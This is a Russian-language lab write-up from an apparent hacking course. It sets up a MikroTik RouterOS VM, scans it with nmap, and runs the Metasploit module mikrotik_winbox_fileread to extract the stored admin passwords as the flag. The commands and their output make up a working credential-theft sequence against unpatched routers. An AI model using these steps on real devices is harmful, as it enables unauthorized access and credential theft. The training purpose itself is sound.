
Практика «Выход за рамки ДМЗ»
Подготовка

Требования к лабораторному стенду:

На вашей операционной системе должно быть установлено программное обеспечение VirtualBox

Поддерживаемые ОС: Linux,Windows, MacOS (x64). MacOS с архитектурой arm (m1/m2/…) не поддерживаются.
 

Для подготовки стенда:

Необходимо скачать образ виртуальной машины по ссылке: Mikrotik.ova (Зеркало: Mikrotik.ova Яндекс.Диск)
https://disk.yandex.ru/d/xm-8o6MLVW0Z3A

https://cybered-my.sharepoint.com/personal/v_karmanov_cyber-ed_ru/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Fv%5Fkarmanov%5Fcyber%2Ded%5Fru%2FDocuments%2F%D0%9F%D1%80%D0%BE%D1%84%D0%B5%D1%81%D1%81%D0%B8%D1%8F%20%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%2E%20%D0%9F%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D0%BA%D0%B0%2F9%20%D0%92%D1%8B%D1%85%D0%BE%D0%B4%20%D0%B7%D0%B0%20%D1%80%D0%B0%D0%BC%D0%BA%D0%B8%20%D1%81%D0%B5%D1%82%D0%B8%20%D0%94%D0%9C%D0%97%2FMikrotik%2Eova&parent=%2Fpersonal%2Fv%5Fkarmanov%5Fcyber%2Ded%5Fru%2FDocuments%2F%D0%9F%D1%80%D0%BE%D1%84%D0%B5%D1%81%D1%81%D0%B8%D1%8F%20%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%2E%20%D0%9F%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D0%BA%D0%B0%2F9%20%D0%92%D1%8B%D1%85%D0%BE%D0%B4%20%D0%B7%D0%B0%20%D1%80%D0%B0%D0%BC%D0%BA%D0%B8%20%D1%81%D0%B5%D1%82%D0%B8%20%D0%94%D0%9C%D0%97&ga=1


Импортировать виртуальную машину Mikrotik двойным нажатием на файл Mikrotik.ova.

После импорта виртуальной машины, запустить ее и войти под пользователем admin с паролем password  для инициализации сети ОС.
 

Возможные проблемы:

1. Так как данный виртуальный стенд является виртуальной машиной, операционная система RouterOS может испытывать трудности с получением сетевого адреса в вашей локальной сети. Убедитесь, что в настройках виртуальной машины вы используете опцию “Bridged Adapter”, чтобы ваша виртуальная машина получила адрес в вашей физической сети.
(Это может занять от 1 до 5 минут).
Чтобы проверить, что RouterOS получила IP адрес введите команду: ip address print.

В случае, если ваша виртуальная машина получила IP адрес, вы увидите строку, похожую на следующую:

# ADDRESS NETWORK INTERFACE
0 D 192.168.0.147/24 192.168.0.0 ether1

Настраиваем ВМ как:
Attached to:  Bridged Adapter 
Name:  wlan0  (выбор рабочей сети на ноуте)

После старта ВМ проверяем ее IP:
ip address print
# 0 D 192.168.32.68/24 192.168.32.0ether1

С ноута должен пинговаться IP ВМ mikrotik\
# проводим сканирование
nmap -sT -Pn -n -F -sV --open 192.168.92.68
# результат
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 11:38 MSK
Nmap scan report for 192.168.32.68
Host is up (0.11s latency).
Not shown: 95 closed tcp ports (conn-refused)
PORT     STATE SERVICE        VERSION
21/tcp   open  ftp            MikroTik router ftpd 6.40.7
22/tcp   open  ssh            MikroTik RouterOS sshd (protocol 2.0)
23/tcp   open  telnet         Linux telnetd
80/tcp   open  http           MikroTik router config httpd
2000/tcp open  bandwidth-test MikroTik bandwidth-test server
Service Info: OSs: Linux, RouterOS; Device: router; CPE: cpe:/o:mikrotik:routeros, cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.33 seconds

Нас интересует 21/tcp   open  ftp            MikroTik router ftpd 6.40.7

# Запуск metasploit framework
msf6 > search Mikrotik 
msf6> use auxiliary/gather/mikrotik_winbox_fileread
msf6> set RHOSTS 192.168.32.68
msf6> run
# результат
[*] Running for 192.168.32.68...
[*] 192.168.32.68 - Session ID: 1
[*] 192.168.32.68 - Requesting user database through exploit
[*] 192.168.32.68 - Exploit successful, attempting to extract usernames & passwords
[*] 192.168.32.68 - Extracted Username: "admin" and password "password"
[*] 192.168.32.68 - Extracted Username: "admin" and password ""
[*] 192.168.32.68 - Extracted Username: "admin" and password "P@sSw0rd!"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

# FLAG P@sSw0rd!
